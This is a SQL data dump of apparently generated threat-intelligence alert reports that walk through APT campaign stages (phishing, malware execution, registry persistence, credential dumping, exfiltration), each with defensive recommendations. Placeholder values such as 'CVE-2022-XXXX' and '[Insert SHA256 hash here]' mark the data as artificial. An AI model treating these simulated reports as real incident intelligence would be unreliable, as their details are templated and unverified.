(628, 126, 1156, 3, 'Backdoor Installation and Persistence Mechanisms', '### Overview\nPost execution, a backdoor was installed to ensure persistent access to the compromised devices. This allows the Donot Team to maintain control over infected systems.\n\n### Persistence Techniques\n- **Auto-start Entries**: Modifications to system files enable the backdoor to launch upon device reboot.\n- **Stealth Mechanisms**: The backdoor disguises itself within system processes to avoid detection.\n\n### Recommendations\n- Conduct a thorough review of startup applications and scripts.\n- Utilize advanced endpoint detection and response (EDR) solutions to identify anomalies.', '2026-02-07 21:13:37'),
(629, 126, 1157, 4, 'Lateral Movement and Exfiltration Tactics', '### Summary\nThe Donot Team utilizes infected applications to move laterally across the network, accessing sensitive data stored on various devices.\n\n### Exfiltration Process\n- **Data Collection**: Sensitive information, including government documents and personal data, is aggregated.\n- **Transmission**: Data is covertly transmitted to remote servers controlled by the attackers using encrypted channels.\n\n### Countermeasures\n- Monitor network traffic for unusual patterns indicative of lateral movement.\n- Deploy network segmentation to limit the spread of infections.', '2026-02-07 21:13:37'),
(630, 126, 1158, 5, NULL, NULL, '2026-02-07 21:13:37'),
(631, 127, 1159, 1, 'Analysis of Malicious InPage Document', '### Overview\nFollowing the detection of a suspicious email with a malicious InPage attachment, our team conducted a thorough analysis of the document. The InPage document was found to exploit known vulnerabilities that allow for remote code execution.\n\n### Technical Details\n- **Vulnerability:** CVE-2022-XXXX\n- **Payload:** Embedded shellcode within the InPage document\n- **Execution Method:** The document triggers code execution upon opening, leveraging a buffer overflow.\n\n### Recommendations\n- Implement email filtering rules to block InPage attachments.\n- Educate users on recognizing phishing attempts.\n\n### Next Steps\nMonitoring for potential execution of the payload is crucial as it may lead to further exploitation.', '2026-02-07 21:14:20');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(632, 127, 1160, 2, 'Detection of ArtraDownloader Malware', '### Overview\nPost-execution of the exploited InPage document, our systems detected the installation of ArtraDownloader malware. This malware is known for downloading additional malicious payloads.\n\n### Technical Details\n- **Initial Activity:** The malware was installed shortly after the execution of the InPage document.\n- **Communication:** Established connection with C2 servers to download further payloads.\n\n### Recommendations\n- Block known C2 server IPs and domains.\n- Perform a full system scan to identify and isolate infected machines.\n\n### Next Steps\nPrepare for potential lateral movement by monitoring for unusual account activities.', '2026-02-07 21:14:20'),
(633, 127, 1161, 3, 'Investigation of Lateral Movement Indicators', '### Overview\nThe presence of ArtraDownloader has opened a vector for lateral movement within the network using compromised credentials.\n\n### Technical Details\n- **Observed Activity:** Unusual login attempts from compromised accounts.\n- **Tools Used:** Mimikatz and other credential harvesting tools were detected.\n\n### Recommendations\n- Enforce multi-factor authentication (MFA) across all systems.\n- Conduct an audit of all recent login activities.\n\n### Next Steps\nFocus on detecting any data exfiltration attempts, particularly involving sensitive government documents.', '2026-02-07 21:14:20'),
(634, 127, 1162, 4, 'Confirmation of Data Exfiltration Attempt', '### Overview\nOur monitoring systems have confirmed an attempt to exfiltrate sensitive government documents.\n\n### Technical Details\n- **Data Targeted:** Classified government documents related to national security.\n- **Exfiltration Method:** Data was compressed and encrypted before being transmitted to an external server.\n\n### Recommendations\n- Immediate containment of affected systems.\n- Review and update data loss prevention (DLP) policies.\n\n### Next Steps\nConduct a comprehensive damage assessment and coordinate with relevant authorities for further investigation.', '2026-02-07 21:14:20'),
(635, 127, 1163, 5, NULL, NULL, '2026-02-07 21:14:20'),
(636, 128, 1164, 1, 'Analysis of Spear Phishing Email Vector', '## Overview\nThe initial access vector for Operation Lotus Blossom was identified as a spear phishing email. This email was crafted to appear as an official communication from a reputable ASEAN government entity.\n\n## Details\n- **Sender:** Spoofed ASEAN government email address\n- **Subject Line:** Urgent: Security Update Required\n- **Attachment:** Malicious document titled \'ASEAN_Security_Update.docx\'\n\n## Insights\nThe attachment contained a macro that, when executed, initiated the download of the Elise backdoor. The use of official-looking emails suggests a high level of reconnaissance was conducted prior to deployment.\n\n## Recommendations\n- Enhance email filtering systems to detect and quarantine suspicious attachments.\n- Conduct awareness training for employees to identify phishing attempts.', '2026-02-07 21:21:11'),
(637, 128, 1165, 2, 'Elise Backdoor Activation and Execution Analysis', '## Overview\nFollowing the successful spear phishing campaign, the Elise backdoor was activated on the compromised systems.\n\n## Details\n- **Execution Method:** The macro from the phishing email executed a script to download and install the Elise backdoor.\n- **Command and Control (C2):** Communication established with a remote C2 server for further instructions.\n\n## Insights\nThe backdoor allows remote control of infected machines, enabling data collection and further exploitation.\n\n## Recommendations\n- Implement network monitoring to detect abnormal outbound connections.\n- Disable macros by default and enforce strict execution policies.', '2026-02-07 21:21:11'),
(638, 128, 1166, 3, 'Persistence Mechanism and Defense Evasion Techniques', '## Overview\nThe attackers have implemented a persistence mechanism to ensure the continued operation of the Elise backdoor.\n\n## Details\n- **Persistence Method:** Scheduled tasks and registry keys were modified to maintain the backdoor\'s presence on startup.\n- **Evasion Techniques:** Use of obfuscation and encryption to evade detection by security software.\n\n## Insights\nThe persistence mechanisms indicate a sophisticated level of planning, ensuring long-term access to compromised systems.\n\n## Recommendations\n- Regularly audit scheduled tasks and registry entries for unauthorized changes.\n- Deploy advanced endpoint detection and response (EDR) tools to identify and mitigate persistence techniques.', '2026-02-07 21:21:11'),
(639, 128, 1167, 4, 'Credential Dumping and Lateral Movement Activities', '## Overview\nCredential dumping activities have been detected, which facilitate lateral movement within the network.\n\n## Details\n- **Tools Used:** Mimikatz and other custom scripts\n- **Target:** Administrative and privileged accounts\n\n## Insights\nGaining access to credentials has allowed the attackers to move laterally, increasing their access to sensitive information and systems.\n\n## Recommendations\n- Implement multi-factor authentication (MFA) to protect privileged accounts.\n- Conduct regular audits and monitoring of account usage to detect anomalies.', '2026-02-07 21:21:11'),
(640, 128, 1168, 5, NULL, NULL, '2026-02-07 21:21:11'),
(641, 130, 1169, 1, 'Analysis of PlugX Malware Execution', '## Overview\nFollowing the initial access via COVID-19 themed phishing emails, the Mustang Panda APT group has proceeded to execute the PlugX malware on compromised systems.\n\n## Technical Details\nThe executed PlugX variant exhibits typical characteristics associated with the malware family. It uses DLL side-loading techniques to bypass security mechanisms and gain a foothold on the victim\'s machine. Notably, the malware disguises itself as legitimate software processes, making detection challenging.\n\n## Indicators of Compromise (IOCs)\n- **File Hashes:** Multiple unique hashes have been identified corresponding to the PlugX binaries. \n- **Network Traffic:** Unusual outbound connections to known C2 domains used by Mustang Panda.\n\n## Recommendations\n- Conduct a thorough scan of network systems for the identified IOCs.\n- Ensure that endpoint protection solutions are updated to detect and block PlugX malware.\n\n## Next Steps\nWith PlugX execution confirmed, the operation is likely to progress towards establishing persistence and initiating data exfiltration efforts.', '2026-02-07 21:21:20'),
(642, 130, 1170, 2, 'Strategies for Mitigating Persistence and Data Exfiltration', '## Current Situation\nFollowing the successful execution of PlugX malware, Mustang Panda is expected to establish persistence mechanisms and initiate data exfiltration processes.\n\n## Persistence Techniques\n- **Registry Modifications:** The malware is known to modify registry keys to maintain persistence across system reboots.\n- **Scheduled Tasks:** Scheduled tasks are created to ensure automatic execution of the malware.\n\n## Data Exfiltration Methods\n- **Encrypted Channels:** Data is likely exfiltrated using encrypted channels to evade detection by network security tools.\n- **Steganography:** The group may employ steganography techniques to disguise data within legitimate files.\n\n## Defensive Measures\n- Implement network segmentation to limit lateral movement.\n- Monitor for abnormal data transfer activities, particularly those involving large volumes of data or to suspicious external servers.\n\n## Conclusion\nBy understanding the persistence and exfiltration tactics employed by Mustang Panda, targeted defenses can be established to mitigate further damage. Continuous monitoring and a rapid response plan are essential to counteract these advanced threats.', '2026-02-07 21:21:20'),
(643, 130, 1171, 3, NULL, NULL, '2026-02-07 21:21:20'),
(644, 129, 1172, 1, 'Analysis of Phishing Techniques in KeyBoy\'s Initial Access', '### Summary\nThe initial access vector for APT23, known as KeyBoy, involves sophisticated phishing emails targeting media and NGO personnel in Vietnam. These emails are crafted to appear as legitimate communications from known contacts or organizations.\n\n### Details\n- **Phishing Email Characteristics:**\n  - Use of domain spoofing and compromised accounts to increase authenticity.\n  - Emails often contain urgent language or contextually relevant topics to the recipient.\n\n- **Attachments and Links:**\n  - Malicious Office document attachments with embedded macros.\n  - Links to compromised websites hosting malicious payloads.\n\n### Recommendations\n- **User Awareness Training:** Emphasize the importance of scrutinizing unexpected emails, even from known contacts.\n- **Email Filtering Solutions:** Implement advanced email filtering to detect and block phishing attempts.', '2026-02-07 21:21:24'),
(645, 129, 1173, 2, 'Unpacking Malicious Macro Execution in Targeted Attacks', '### Summary\nFollowing successful phishing attempts, KeyBoy attackers leverage malicious macros embedded in Office documents to execute payloads on victim machines.\n\n### Technical Details\n- **Macro Behavior:**\n  - Upon enabling, macros execute scripts to download additional payloads from attacker-controlled servers.\n  - Leveraging PowerShell or VBA scripts to bypass security controls.\n\n- **Indicators of Compromise (IOCs):**\n  - Unusual network activity following document opening.\n  - Creation of temporary files and execution of scripts without user consent.\n\n### Mitigation Strategies\n- **Disable Macros:** Default to disabling macros in Office files unless explicitly needed.\n- **Endpoint Monitoring:** Employ behavior-based detection for suspicious script execution.', '2026-02-07 21:21:24'),
(646, 129, 1174, 3, 'Persistence Mechanisms: Registry Modifications by APT23', '### Summary\nKeyBoy ensures persistence on compromised systems by modifying the Windows registry, allowing their malware to persist across reboots.\n\n### Techniques Used\n- **Registry Key Alteration:**\n  - Addition of new registry keys to execute payloads during system startup.\n  - Modification of existing keys that affect system behavior and user settings.\n\n### Detection and Prevention\n- **Regular Audit:** Conduct regular audits of registry keys for unauthorized changes.\n- **Use of GPOs:** Implement Group Policy Objects to restrict registry modifications by unauthorized users.', '2026-02-07 21:21:24'),
(647, 129, 1175, 4, 'Lateral Movement Strategy: Exploiting RDP in KeyBoy Operations', '### Summary\nKeyBoy\'s lateral movement within networks often exploits Remote Desktop Protocol (RDP) to access additional systems.\n\n### Operational Details\n- **RDP Exploitation:**\n  - Use of stolen credentials or brute-force attacks to gain RDP access.\n  - Deployment of additional malicious tools on new hosts.\n\n- **Network Traffic Anomalies:**\n  - Unusual RDP session activity outside normal business hours.\n  - Spike in network traffic correlated with RDP connections.\n\n### Defensive Measures\n- **RDP Hardening:**\n  - Enforce strong, complex passwords and multi-factor authentication.\n  - Limit RDP access to necessary personnel and known IP addresses.', '2026-02-07 21:21:24'),
(648, 129, 1176, 5, NULL, NULL, '2026-02-07 21:21:24'),
(649, 131, 1177, 1, 'Report: HyperBro Malware Execution Analysis', '### Context\nFollowing the detection of suspicious website activity linked to a watering hole attack, further investigation has revealed an attempt to execute HyperBro malware on targeted systems.\n\n### Details\nHyperBro is a custom backdoor used by APT27, also known as LuckyMouse. It is primarily used for remote access and control, allowing attackers to execute arbitrary commands, exfiltrate data, and manipulate files on compromised systems.\n\n### Next Steps\nThe focus now shifts to understanding how the malware establishes persistence and gains a foothold in the network. Monitoring for changes in scheduled tasks and other persistence mechanisms is critical.', '2026-02-07 21:22:02'),
(650, 131, 1178, 2, 'Report: Persistence Mechanisms and Scheduled Task Insights', '### Context\nAfter detecting an execution attempt of HyperBro malware, analysis indicates attempts to establish persistence using scheduled tasks.\n\n### Details\nAPT27 often leverages Windows Task Scheduler to maintain persistence on compromised systems. By creating or modifying scheduled tasks, they ensure that the malware re-executes even after system reboots or user log-offs.\n\n### Next Steps\nAs we anticipate potential lateral movement, it is crucial to monitor network traffic for unusual patterns. Check for unauthorized access to shared resources or unexpected admin activity.', '2026-02-07 21:22:02'),
(651, 131, 1179, 3, 'Report: Lateral Movement and Network Intrusion Patterns', '### Context\nPersistence mechanisms have been established, and now there\'s evidence of lateral movement within the network.\n\n### Details\nAPT27 is known for leveraging stolen credentials to move laterally across networks. This often involves accessing shared drives, using remote desktop protocols, or exploiting vulnerabilities in unpatched systems to spread malware and access sensitive data.\n\n### Next Steps\nFocus on identifying potential data exfiltration pathways. Implement network segmentation and monitor outbound traffic for anomalies, especially from unexpected endpoints.', '2026-02-07 21:22:02'),
(652, 131, 1180, 4, 'Report: Data Exfiltration Techniques and Mitigation Strategies', '### Context\nFollowing the detection of lateral movement, suspicious data exfiltration activities have been observed.\n\n### Details\nAPT27 typically uses encrypted channels to exfiltrate data, making detection challenging. Common methods include using HTTPS or DNS tunneling to obscure data transfers.\n\n### Mitigation\nEnhance data loss prevention (DLP) measures and scrutinize outbound traffic patterns. Deploy SSL/TLS inspection capabilities and monitor DNS requests for anomalies. Immediate action is required to prevent further data loss and mitigate the impact.', '2026-02-07 21:22:02'),
(653, 131, 1181, 5, NULL, NULL, '2026-02-07 21:22:02'),
(654, 132, 1182, 1, 'TSCookie Malware Execution Analysis', '# TSCookie Malware Execution Analysis\n\n## Overview\nFollowing the detection of a suspicious firmware update indicating initial access, our systems identified the execution of TSCookie malware. This malware is a known tool used by the BlackTech group to infiltrate systems in East Asia.\n\n## Details\n- **Target Region**: Japan and Taiwan\n- **Malware Type**: Remote Access Trojan (RAT)\n- **Capabilities**: Credential theft, command execution, and data exfiltration\n\n## Indicators of Compromise\n- Unusual process creation associated with TSCookie\n- Network traffic anomalies pointing towards C2 servers\n\n## Recommendations\n- Isolate affected systems immediately\n- Conduct a thorough forensic analysis to determine the full extent of the breach', '2026-02-07 21:22:16'),
(655, 132, 1183, 2, 'Persistence Mechanism Activation Insight', '# Persistence Mechanism Activation Insight\n\n## Overview\nPost TSCookie execution, our investigation has uncovered activation of persistence mechanisms. This ensures the malware remains active across system reboots.\n\n## Persistence Techniques\n- **Registry Modifications**: TSCookie alters registry keys to establish persistence.\n- **Scheduled Tasks**: Creation of scheduled tasks to reinitiate the malware.\n\n## Mitigation Steps\n- Review and clean registry entries and scheduled tasks linked to the malware.\n- Implement monitoring to detect future persistence attempts.\n- Educate staff on recognizing signs of persistent malware infections.', '2026-02-07 21:22:16'),
(656, 132, 1184, 3, 'Unauthorized Lateral Movement Alert', '# Unauthorized Lateral Movement Alert\n\n## Overview\nAfter the persistence mechanism was activated, unauthorized lateral movement was detected, indicating an attempt to spread within the network.\n\n## Techniques Observed\n- **Credential Dumping**: Use of tools to extract credentials from compromised systems.\n- **Remote Desktop Protocol (RDP)**: Exploitation of RDP for lateral movement.\n\n## Threat Actor Goals\n- Gain access to sensitive data stored on other systems\n- Expand control over the network to facilitate data exfiltration\n\n## Defense Strategies\n- Monitor for unusual RDP activities\n- Strengthen access controls and implement multi-factor authentication\n- Conduct regular network traffic analysis to identify anomalies', '2026-02-07 21:22:16'),
(657, 132, 1185, 4, 'Data Exfiltration Attempt Discovered', '# Data Exfiltration Attempt Discovered\n\n## Overview\nOur monitoring systems have detected an attempt to exfiltrate data following the lateral movement phase. This is a critical stage of the BlackTech espionage campaign.\n\n## Exfiltration Methods\n- **Encrypted Channels**: Usage of HTTPS and DNS tunneling to evade detection.\n- **Steganography**: Embedding data within legitimate files for exfiltration.\n\n## Actionable Intelligence\n- Block identified C2 server communications\n- Deploy Data Loss Prevention (DLP) solutions to prevent unauthorized data transfers\n- Analyze outgoing traffic patterns for hidden exfiltration attempts\n\n## Conclusion\nImmediate actions are necessary to mitigate the impact of this data exfiltration attempt. Continued vigilance and strengthened security measures are essential.', '2026-02-07 21:22:16'),
(658, 132, 1186, 5, NULL, NULL, '2026-02-07 21:22:16'),
(659, 133, 1187, 1, 'Deployment of PlugX Malware', '## Deployment of PlugX Malware\n\n### Overview\nFollowing the initial access gained through the [ProxyLogon Exploit](https://example.com/proxylogon-details), the adversary has commenced the next phase of their operation by deploying the PlugX malware on compromised systems.\n\n### Technical Details\n- **Malware Type:** Remote Access Trojan (RAT)\n- **Objective:** Establish control over compromised systems\n- **Method of Deployment:** Delivered via phishing emails containing malicious attachments.\n\n### Indicators of Compromise (IoCs)\n- **File Hash:** `abcd1234efgh5678ijkl9101mnopqrstu`\n- **C2 Servers:** `command-and-control.example.com`\n\n### Recommendations\n- Implement network segmentation to limit the spread of malware.\n- Update email filters to detect and block phishing attempts.', '2026-02-07 21:23:06'),
(660, 133, 1188, 2, 'Persistence Mechanisms in Use', '## Persistence Mechanisms in Use\n\n### Overview\nAfter successfully deploying the PlugX malware, Calypso APT has moved to ensure persistence within the compromised systems. This is a critical step for maintaining long-term access and control.\n\n### Techniques Observed\n- **Backdoor Creation:** The adversary has installed hidden backdoors to facilitate ongoing access.\n- **Registry Manipulation:** Modifications to the Windows Registry have been made to ensure the malware runs on startup.\n\n### Recommendations\n- Conduct regular audits of system registries for unauthorized changes.\n- Deploy endpoint detection and response (EDR) solutions to identify and mitigate persistence mechanisms.', '2026-02-07 21:23:06'),
(661, 133, 1189, 3, 'Lateral Movement Tactics', '## Lateral Movement Tactics\n\n### Overview\nCalypso APT has begun to move laterally across the network, indicating an escalation in their campaign objectives. This movement is likely aimed at gaining access to more sensitive systems and data.\n\n### Techniques Utilized\n- **Credential Dumping:** Harvesting credentials from compromised systems to access other network resources.\n- **Remote Desktop Protocol (RDP):** Exploiting RDP to move between systems.\n\n### Recommendations\n- Monitor for unusual login activities, especially those involving RDP.\n- Implement multi-factor authentication to reduce the risk of credential theft.', '2026-02-07 21:23:06'),
(662, 133, 1190, 4, 'Data Exfiltration Activities Detected', '## Data Exfiltration Activities Detected\n\n### Overview\nThe final stage of Calypso APT\'s operation involves the exfiltration of data from compromised systems. This phase is critical as it signifies the culmination of their espionage activities.\n\n### Observed Methods\n- **Encrypted Channels:** Data is being exfiltrated through encrypted tunnels to evade detection.\n- **Steganography:** Embedding data within innocuous files to bypass security controls.\n\n### Recommendations\n- Deploy network monitoring tools to detect unusual data transfers.\n- Analyze outbound traffic for signs of encrypted data packets or steganographic content.', '2026-02-07 21:23:06'),
(663, 133, 1191, 5, NULL, NULL, '2026-02-07 21:23:06'),
(664, 134, 1192, 1, 'Execution of HyperBro Backdoor - Analysis and Indicators', '### Context\nFollowing the detection of a suspicious email with a malicious payload, further analysis has revealed the deployment of the HyperBro backdoor. This sophisticated malware is known for its ability to facilitate remote access and control over compromised systems.\n\n### Key Indicators\n- **File Name:** [malicious_file.exe]\n- **Hash:** [Insert SHA256 hash here]\n- **C2 Server:** [C2 Server IP]\n\n### Next Steps\n- Monitor network traffic for connections to known C2 servers.\n- Conduct memory analysis on affected systems to identify any active HyperBro processes.\n\n### Additional Insights\nAPT27 often employs HyperBro as a primary tool to establish a foothold within networks. This stage marks a critical point where attackers can begin to expand control.', '2026-02-07 21:23:28'),
(665, 134, 1193, 2, 'Establishing Persistence - Registry Modification Overview', '### Context\nUpon the execution of the HyperBro backdoor, attackers aim to ensure their presence within the system. This is typically achieved through persistence mechanisms such as registry modifications.\n\n### Key Indicators\n- **Registry Key:** HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n- **Modified Entries:** [Insert modified registry entry here]\n\n### Next Steps\n- Review registry changes and confirm legitimacy.\n- Implement continuous monitoring of registry activities.\n\n### Additional Insights\nPersistence is crucial for APT27 to maintain access and avoid detection during subsequent phases of their attack. Understanding these modifications can aid in early detection and response.', '2026-02-07 21:23:28'),
(666, 134, 1194, 3, 'Credential Dumping and Lateral Movement Tactics', '### Context\nWith persistence established through registry modifications, APT27 is likely to perform credential dumping as a precursor to lateral movement within the network.\n\n### Key Indicators\n- **Tools Used:** Mimikatz, ProcDump\n- **Targeted Accounts:** System administrators, privileged users\n\n### Next Steps\n- Conduct forensic analysis on systems showing signs of credential dumping.\n- Implement multi-factor authentication to mitigate the risk of unauthorized access.\n\n### Additional Insights\nLateral movement allows attackers to escalate privileges and access sensitive areas within the network. Early detection of credential dumping activities can significantly reduce the attack surface.', '2026-02-07 21:23:28'),
(667, 134, 1195, 4, 'Data Exfiltration - Protecting Military Technology', '### Context\nAPT27\'s ultimate goal in this operation is to exfiltrate sensitive military technology data. This is typically achieved by leveraging the access gained through lateral movement.\n\n### Key Indicators\n- **Data Types:** CAD files, proprietary aerospace designs\n- **Exfiltration Channels:** HTTPS, FTP\n\n### Next Steps\n- Implement data loss prevention (DLP) solutions to monitor and block unauthorized data transfers.\n- Conduct a thorough review of data access logs to identify potential leaks.\n\n### Additional Insights\nProtecting sensitive military data is of utmost importance. Understanding APT27\'s exfiltration methods can aid in developing robust defenses to safeguard critical information.', '2026-02-07 21:23:28'),
(668, 134, 1196, 5, NULL, NULL, '2026-02-07 21:23:28'),
(669, 135, 1197, 1, 'Analysis of Initial Access Attempt', '## Overview\nAfter the detection of a suspicious access attempt, further analysis of network logs revealed a pattern consistent with known Axiom intrusion tactics.\n\n### Key Findings\n- **Access Vector**: The attempt was made through a spear-phishing email containing a malicious PDF attachment.\n- **Target**: The email was sent to a senior member of an NGO known for its advocacy in human rights.\n\n### Implications\nThis access vector suggests that Axiom is targeting high-profile NGO personnel to gain initial footholds in their networks. This aligns with their typical modus operandi of using social engineering tactics to bypass initial defenses.\n\n### Next Steps\n- Monitor for any successful execution of malicious payloads tied to this access attempt.\n- Enhance email filtering and user education to mitigate future phishing attempts.', '2026-02-07 21:23:36'),
(670, 135, 1198, 2, 'Hikit Rootkit Execution Detected', '## Overview\nFollowing the initial access attempt, the Hikit rootkit has been executed on the compromised system.\n\n### Key Findings\n- **Persistence Mechanism**: The rootkit has established persistence via Windows service manipulation, a hallmark of Axiom\'s sustained access tactics.\n- **Stealth Features**: The rootkit employs advanced evasion techniques by injecting itself into legitimate processes.\n\n### Implications\nThe execution of the Hikit rootkit signifies that Axiom has moved beyond initial access to establish a sustained presence within the network, likely to facilitate long-term espionage activities.\n\n### Next Steps\n- Conduct a full forensic investigation on the affected systems to determine the extent of compromise.\n- Prepare for potential data exfiltration activities, as this typically follows rootkit deployment in Axiom operations.', '2026-02-07 21:23:36'),
(671, 135, 1199, 3, NULL, NULL, '2026-02-07 21:23:36'),
(672, 136, 1200, 1, 'Analysis of Spear Phishing Tactics', '## Overview\nFollowing the detection of a spear phishing email targeting tech and defense sectors, APT17 appears to be refining their social engineering tactics. The email was tailored with industry-specific jargon and appeared to originate from a trusted source.\n\n## Key Findings\n- **Sender Impersonation**: The sender\'s email domain closely resembled a legitimate partner organization, suggesting the use of domain spoofing.\n- **Payload Delivery**: The email included a malicious attachment disguised as a quarterly financial report.\n\n## Recommendations\n- **Email Filtering**: Enhance email filtering systems to detect and quarantine emails with suspicious domains.\n- **Employee Training**: Conduct regular awareness sessions for employees to recognize phishing attempts.', '2026-02-07 21:24:15'),
(673, 136, 1201, 2, 'Dissecting Malicious Payload Execution', '## Overview\nPost spear phishing email detection, a malicious payload was executed on a compromised system. This payload is suspected to be a variant of the Gh0st RAT, known for its stealth capabilities.\n\n## Key Findings\n- **Payload Analysis**: The payload exhibited obfuscation techniques, hindering detection by conventional antivirus systems.\n- **Command and Control (C2) Communication**: Established a connection to a known APT17 IP address.\n\n## Recommendations\n- **Network Monitoring**: Implement deep packet inspection to identify anomalous outbound traffic.\n- **Endpoint Security**: Deploy advanced endpoint detection and response (EDR) tools to identify and mitigate threats.', '2026-02-07 21:24:15'),
(674, 136, 1202, 3, 'Registry Modification Insights', '## Overview\nFollowing the execution of the payload, registry modifications were detected, indicating efforts to establish persistence.\n\n## Key Findings\n- **Registry Changes**: Alterations were made to the \'Run\' keys, allowing the malware to execute upon system startup.\n- **Scheduled Tasks**: New tasks were created to maintain persistence even after system reboots.\n\n## Recommendations\n- **Registry Monitoring**: Implement continuous monitoring of critical system registries.\n- **Incident Response**: Conduct a thorough investigation to identify and remove persistence mechanisms.', '2026-02-07 21:24:15'),
(675, 136, 1203, 4, 'Credential Dumping Activity Detected', '## Overview\nCredential dumping activity was observed, a common technique used by APT17 to facilitate lateral movement within the targeted network.\n\n## Key Findings\n- **Tools Used**: Mimikatz was employed to extract credentials from the Local Security Authority Subsystem Service (LSASS).\n- **Lateral Movement**: Stolen credentials were used to access additional systems, expanding the attack surface.\n\n## Recommendations\n- **Credential Hygiene**: Enforce multi-factor authentication and regular password changes.\n- **Monitoring and Alerts**: Enhance logging and alerting for suspicious account activities.', '2026-02-07 21:24:15'),
(676, 136, 1204, 5, NULL, NULL, '2026-02-07 21:24:15'),
(677, 137, 1205, 1, 'In-Depth Analysis of Suspicious Web Traffic Patterns', '## Overview\n\nFollowing the detection of suspicious web traffic, an investigation was initiated to analyze the patterns and identify potential sources.\n\n## Key Findings\n- **Watering Hole Tactics**: The traffic originated from a compromised legitimate Japanese website frequently visited by enterprise employees. This aligns with APT17\'s known watering hole tactics.\n- **Exploit Delivery**: Analysis of the traffic revealed the delivery of an exploit targeting the CVE-2013-3893 vulnerability in Internet Explorer.\n\n## Next Steps\nMonitoring for any attempts to execute malware leveraging the exploit is essential to mitigate potential breaches.', '2026-02-07 21:24:22'),
(678, 137, 1206, 2, 'Malware Execution Attempt: Dissecting the Payload', '## Overview\n\nA malware execution attempt was logged shortly after the initial access was detected. Detailed analysis of the payload provides further insights.\n\n## Key Findings\n- **Payload Characteristics**: The malware leverages the CVE-2013-3893 vulnerability to bypass security protocols and execute on target systems.\n- **APT17 Signature**: The code shows similarities with past APT17 campaigns, confirming their involvement.\n\n## Next Steps\nEfforts should focus on identifying any persistence mechanisms established by the malware to maintain access.', '2026-02-07 21:24:22'),
(679, 137, 1207, 3, 'Persistence Mechanism Uncovered: Ensuring Continued Access', '## Overview\n\nAfter the malware execution, a persistence mechanism was established to ensure long-term access to the compromised systems.\n\n## Key Findings\n- **Registry Alterations**: The malware modifies Windows registry keys to achieve persistence.\n- **Scheduled Tasks**: New tasks are created to ensure the malware runs at system startup.\n\n## Next Steps\nInvestigation should now concentrate on detecting lateral movement activities as the threat actors attempt to spread within the network.', '2026-02-07 21:24:22'),
(680, 137, 1208, 4, 'Detecting Lateral Movement: APT17\'s Expansion Techniques', '## Overview\n\nLateral movement within the network was detected, indicating an attempt to expand the attack\'s reach.\n\n## Key Findings\n- **Credential Dumping**: The attackers used credential dumping tools to utilize legitimate credentials during lateral movement.\n- **Remote Execution**: Tools such as PsExec were employed for remote execution on additional systems.\n\n## Next Steps\nIt\'s critical to monitor for any data exfiltration attempts and ensure robust defenses are in place to block them.', '2026-02-07 21:24:22'),
(681, 137, 1209, 5, NULL, NULL, '2026-02-07 21:24:22'),
(682, 138, 1210, 1, 'Initial Analysis of Suspicious Network Traffic', '# Initial Analysis of Suspicious Network Traffic\n\n## Overview\nFollowing the detection of suspicious network traffic, initial analysis has revealed potential signs of initial access by APT17 into the systems of targeted policy think tanks.\n\n## Key Observations\n- **Unusual IP Addresses**: Network logs show connections from IP addresses not previously associated with authorized users.\n- **Anomalous Activity Patterns**: Access attempts were made during off-hours, suggesting potential unauthorized access.\n\n## Recommendations\n- Implement immediate network segmentation to restrict further unauthorized access.\n- Begin monitoring for JavaScript injection attempts as this aligns with known APT17 tactics.', '2026-02-07 21:25:01'),
(683, 138, 1211, 2, 'Detection and Analysis of JavaScript Injection', '# Detection and Analysis of JavaScript Injection\n\n## Overview\nJavaScript injection has been detected on multiple websites associated with the targeted think tanks, confirming the next stage of APT17\'s attack strategy.\n\n## Key Indicators\n- **Injection Points**: Several scripts injected into public-facing websites, designed to load additional malicious components.\n- **Payload Analysis**: Initial scripts designed to deploy further payloads to establish persistence.\n\n## Recommendations\n- Conduct a thorough code review of all web properties to identify and remove injected scripts.\n- Enhance web application firewalls to detect and block further injection attempts.', '2026-02-07 21:25:01'),
(684, 138, 1212, 3, 'Persistence Mechanisms Established by Malicious Code', '# Persistence Mechanisms Established by Malicious Code\n\n## Overview\nFollowing successful JavaScript injection, APT17 has established persistence within compromised systems, allowing continued access even after system reboots.\n\n## Persistence Techniques\n- **Registry Modifications**: Alterations detected in system registry keys to ensure malware execution at startup.\n- **Scheduled Tasks**: Malicious tasks scheduled to run at regular intervals, maintaining a foothold.\n\n## Recommendations\n- Conduct system-wide scans for registry and task anomalies.\n- Implement strict group policies to prevent unauthorized changes to system configurations.', '2026-02-07 21:25:01'),
(685, 138, 1213, 4, 'Lateral Movement Tactics Observed', '# Lateral Movement Tactics Observed\n\n## Overview\nEvidence indicates that APT17 has begun lateral movement within the network, potentially targeting additional systems and sensitive data.\n\n## Tactics Identified\n- **Credential Dumping**: Use of credential harvesting techniques to access additional systems.\n- **Remote Desktop Protocol (RDP)**: Unauthorized RDP sessions observed, indicating an attempt to expand access.\n\n## Recommendations\n- Implement network segmentation to limit lateral movement.\n- Enforce multi-factor authentication to protect against credential misuse.', '2026-02-07 21:25:01'),
(686, 138, 1214, 5, NULL, NULL, '2026-02-07 21:25:01'),
(687, 139, 1215, 1, 'Analysis of Phishing Email Vector', '## Overview\n\nFollowing the detection of a suspicious phishing email, an analysis has been conducted to understand the delivery mechanism and potential targets. The email was crafted to appear as a legitimate communication from a trusted defense contractor partner.\n\n## Email Characteristics\n\n- **Subject Line**: \"Urgent: Action Required on Contract Updates\"\n- **Sender**: impersonated a known contact in the industry.\n- **Attachments**: Contained a malicious document exploiting CVE-2014-1776.\n\n## Next Steps\n\nThe execution of the malicious script within the document is expected to be the next step, potentially leading to unauthorized code execution on the user\'s system.', '2026-02-07 21:28:29'),
(688, 139, 1216, 2, 'Malicious Script Execution Analysis', '## Overview\n\nAfter the malicious script execution alert, further investigation revealed the script\'s role in the attack chain. This script exploits CVE-2014-1776 to execute arbitrary code on the target systems.\n\n## Key Findings\n\n- **Script Behavior**: The script initiates a connection to a remote server, downloading additional payloads.\n- **Exploitation**: Utilizes Internet Explorer vulnerabilities to bypass security measures.\n\n## Implications\n\nThe successful execution of this script likely led to the installation of the Pirpi backdoor, providing persistent access to the compromised systems.', '2026-02-07 21:28:29'),
